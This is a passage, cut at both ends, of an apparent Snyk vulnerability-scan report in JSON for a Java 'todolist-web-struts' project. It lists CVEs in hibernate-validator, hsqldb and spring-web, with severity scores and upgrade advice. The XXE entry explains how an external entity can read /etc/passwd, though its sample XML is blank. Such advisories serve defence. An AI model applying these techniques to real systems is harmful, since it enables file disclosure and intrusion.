\n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n## References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n", + "epssDetails": { + "percentile": "0.61710", + "probability": "0.00232", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-10219" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-14T16:07:06.897969Z", + "functions_new": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-10-18T14:55:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + 
"mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-01-09T14:55:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.455389Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHSQLDB-3040860", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "OSS Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,2.7.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hsqldb:hsqldb", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", + "title": "GitHub Commit" + }, + { + "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", + "title": "Mitigation" + }, + { + "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", + "title": "SVN Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:55.045961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. 
For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", + "epssDetails": { + "percentile": "0.85801", + "probability": "0.01274", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-41853" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-77xx-rxvh-q682" + ] + }, + "packageName": "org.hsqldb:hsqldb", + "proprietary": false, + "creationTime": "2022-10-07T07:26:42.276748Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-06T18:52:05Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hsqldb", + "artifactId": "hsqldb" + }, + "publicationTime": "2022-10-07T07:26:42.515068Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.414572Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hsqldb:hsqldb@2.3.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hsqldb:hsqldb", + "version": "2.3.2" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832", + 
"title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.2.0.RELEASE,4.3.29.RELEASE)", + "[5.0.0.RELEASE, 5.0.19.RELEASE)", + "[5.1.0.RELEASE, 5.1.18.RELEASE)", + "[5.2.0.RELEASE, 5.2.9.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "4.3.29.RELEASE", + "5.0.19.RELEASE", + "5.1.18.RELEASE", + "5.2.9.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.6, + "functions": [ + { + "version": [ + "[3.2.0.RELEASE,4.3.29.RELEASE)", + "[5.0.0.RELEASE, 5.0.19.RELEASE)", + "[5.1.0.RELEASE, 5.1.18.RELEASE)", + "[5.2.0.RELEASE, 5.2.9.RELEASE)" + ], + "functionId": { + "filePath": "org/springframework/web/util/WebUtils.java", + "className": "WebUtils", + "functionName": "parseMatrixVariables" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://tanzu.vmware.com/security/cve-2015-5211", + "title": "CVE-2015-5211" + }, + { + "url": "https://pivotal.io/security/cve-2020-5421", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:33.950462Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:07.572789Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:04.397840Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", + "assigner": 
"Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:33.950462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:07.572789Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Improper Input Validation. The protections against Reflected File Download attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a `jsessionid` path parameter.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 4.3.29.RELEASE, 5.0.19.RELEASE, 5.1.18.RELEASE, 5.2.9.RELEASE or higher.\n## References\n- [CVE-2015-5211](https://tanzu.vmware.com/security/cve-2015-5211)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2020-5421)\n", + "epssDetails": { + "percentile": "0.95901", + "probability": "0.15300", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-5421" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2020-09-18T14:36:44.859594Z", + "functions_new": [ + { + "version": [ + "[3.2.0.RELEASE,4.3.29.RELEASE)", + "[5.0.0.RELEASE, 5.0.19.RELEASE)", + "[5.1.0.RELEASE, 5.1.18.RELEASE)", + "[5.2.0.RELEASE, 5.2.9.RELEASE)" + ], + "functionId": { + "className": "org.springframework.web.util.WebUtils", + "functionName": "parseMatrixVariables" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-18T14:23:55Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": 
"secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2020-09-18T16:17:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:07.572789Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@4.3.29.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30163", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0.0.RELEASE,3.2.9.RELEASE)", + "[4.0.0.RELEASE,4.0.5.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.9.RELEASE", + "4.0.5.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [ + { + "version": [ + "[3,3.2.8.RELEASE]", + "[4,4.0.4.RELEASE]" + ], + "functionId": { + "filePath": "org/springframework/http/converter/xml/SourceHttpMessageConverter.java", + "className": "SourceHttpMessageConverter", + "functionName": "readDOMSource" + } + }, + { + "version": [ + "[3,3.2.8.RELEASE]", + "[4,4.0.4.RELEASE]" + ], + "functionId": { + "filePath": "org/springframework/http/converter/xml/SourceHttpMessageConverter.java", + "className": "SourceHttpMessageConverter", + "functionName": "readSAXSource" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": 
"https://github.com/spring-projects/spring-framework/commit/8e096aeef55287dc829484996c9330cf755891a1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/c6503ebbf7c9e21ff022c58706dbac5417b2b5eb", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/16390", + "title": "GitHub Issue" + }, + { + "url": "http://www.gopivotal.com/security/cve-2014-0225", + "title": "Pivotal Security" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0225", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:48:48.781285Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:33.267561Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:48.781285Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. This is due to not disabling the resolution of URI references by default in a DTD declaration. 
This occurs only when processing user provided XML documents.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `org.springframework:spring-web` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/8e096aeef55287dc829484996c9330cf755891a1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/c6503ebbf7c9e21ff022c58706dbac5417b2b5eb)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16390)\n- [Pivotal Security](http://www.gopivotal.com/security/cve-2014-0225)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0225)\n", + "epssDetails": { + "percentile": "0.55630", + "probability": "0.00181", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-0225" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2016-12-25T16:51:52Z", + "functions_new": [ + { + "version": [ + "[3,3.2.8.RELEASE]", + "[4,4.0.4.RELEASE]" + ], + "functionId": { + "className": "org.springframework.http.converter.xml.SourceHttpMessageConverter", + "functionName": "readDOMSource" + } + }, + { + "version": [ + "[3,3.2.8.RELEASE]", + "[4,4.0.4.RELEASE]" + ], + "functionId": { + "className": "org.springframework.http.converter.xml.SourceHttpMessageConverter", + "functionName": "readSAXSource" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-12-25T16:51:52Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + 
"format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2016-12-25T16:51:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:48.781285Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.9.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30164", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "credit": [ + "Toshiaki Maki" + ], + "semver": { + "vulnerable": [ + "[3.2.0.RELEASE, 3.2.14.RELEASE)", + "[4.0.0.RELEASE, 4.1.7.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.14.RELEASE", + "4.1.7.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/5a711c05ec750f069235597173084c2ee796242", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/17727", + "title": "GitHub Issue" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3192", + "title": "NVD" + }, + { + "url": "http://pivotal.io/security/cve-2015-3192", + "title": "Pivotal Security" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.5, + "modificationTime": "2024-03-11T09:46:06.799603Z" + } + ], + 
"cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:18.827537Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:06.799603Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). It does not properly process inline DTD declarations when DTD is not entirely disabled, which allows remote attackers to cause a denial of service (memory consumption and out-of-memory errors) via a crafted XML file.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-web` to version 3.2.14.RELEASE, 4.1.7.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/5a711c05ec750f069235597173084c2ee796242)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/17727)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3192)\n- [Pivotal Security](http://pivotal.io/security/cve-2015-3192)\n", + "epssDetails": { + "percentile": "0.91000", + "probability": "0.03030", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-3192" + ], + "CWE": [ + "CWE-119" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2016-12-25T16:51:55Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-10-16T05:57:41Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + 
{ + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2016-12-25T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:06.799603Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.14.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30165", + "title": "Reflected File Download", + "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "Alvaro Muñoz" + ], + "semver": { + "vulnerable": [ + "[3.2.0.RELEASE, 3.2.15.RELEASE)", + "[4.0.0.RELEASE, 4.1.8.RELEASE)", + "[4.2.0.RELEASE, 4.2.2.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.15.RELEASE", + "4.1.8.RELEASE", + "4.2.2.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.6, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/03f547eb9868f48f44d59b56067d4ac4740672c3", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/2bd1daa75ee0b8ec33608ca6ab065ef3e1815543", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/a95c3d820dbc4c3ae752f1b3ee22ee860b162402", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/18124", + "title": "GitHub Issue" + }, + { + "url": 
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/", + "title": "Oren Hafif Blog" + }, + { + "url": "http://pivotal.io/security/cve-2015-5211", + "title": "Pivotal Security" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2015-5211", + "title": "RedHat CVE Database" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 9.6, + "modificationTime": "2024-03-11T09:48:48.763614Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:03.857756Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:48.763614Z" + } + ], + "description": "## Overview\n\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\n\nAffected versions of this package are vulnerable to Reflected File Download\nvia a crafted URL with a batch script extension, resulting in the response being downloaded rather than rendered.\n\n## Remediation\n\nUpgrade `org.springframework:spring-web` to version 3.2.15.RELEASE, 4.1.8.RELEASE, 4.2.2.RELEASE or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/03f547eb9868f48f44d59b56067d4ac4740672c3)\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/2bd1daa75ee0b8ec33608ca6ab065ef3e1815543)\n\n- [GitHub 
Commit](https://github.com/spring-projects/spring-framework/commit/a95c3d820dbc4c3ae752f1b3ee22ee860b162402)\n\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/18124)\n\n- [Oren Hafif Blog](https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/)\n\n- [Pivotal Security](http://pivotal.io/security/cve-2015-5211)\n\n- [RedHat CVE Database](https://access.redhat.com/security/cve/cve-2015-5211)\n", + "epssDetails": { + "percentile": "0.68512", + "probability": "0.00278", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-5211" + ], + "CWE": [ + "CWE-494" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-10-15T16:51:56Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2016-12-25T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:48.763614Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.15.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31331", + "title": "Cross-site Request Forgery (CSRF)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", + "credit": [ + "Spase Markovski" + ], + "semver": { + "vulnerable": [ + 
